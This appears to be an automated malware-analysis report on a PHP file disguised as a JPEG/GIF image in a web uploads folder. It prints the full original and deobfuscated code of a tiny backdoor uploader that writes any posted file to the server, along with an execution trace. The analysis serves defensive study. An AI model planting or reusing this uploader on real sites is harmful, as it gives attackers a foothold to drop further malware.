PHP Malware Analysis
x12x.php.xxxxjpg
md5: 8c7c3327f879e946f5b4ea07340e87d9
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Files
- copy (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
GIF89GHZ
<?php
if ($_POST) {
if (@copy($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) {
echo "<b>Done Bro</b>-->" . $_FILES["f"]["name"];
} else {
echo "<b>Negativo Bro";
}
} else {
echo "<form method=post enctype=multipart/form-data><input type=file name=f><input name=v type=submit id=v value=up><br>";
}Execution traces
data/traces/8c7c3327f879e946f5b4ea07340e87d9_trace-1676244191.8319.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:23:37.729758]
1 0 1 0.000130 393576
1 3 0 0.000184 395688 {main} 1 /var/www/html/uploads/x12x.php.xxxxjpg 0 0
1 3 1 0.000202 395688
0.000227 314264
TRACE END [2023-02-12 21:23:37.729882]
Generated HTML code
<html><head></head><body>GIF89GHZ
<form method="post" enctype="multipart/form-data"><input type="file" name="f"><input name="v" type="submit" id="v" value="up"><br></form></body></html>Original PHP code
GIF89GHZ
<?php
if($_POST){
if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>Done Bro</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>Negativo Bro";
}
}
else{
echo "<form method=post enctype=multipart/form-data><input type=file name=f><input name=v type=submit id=v value=up><br>";
}
?>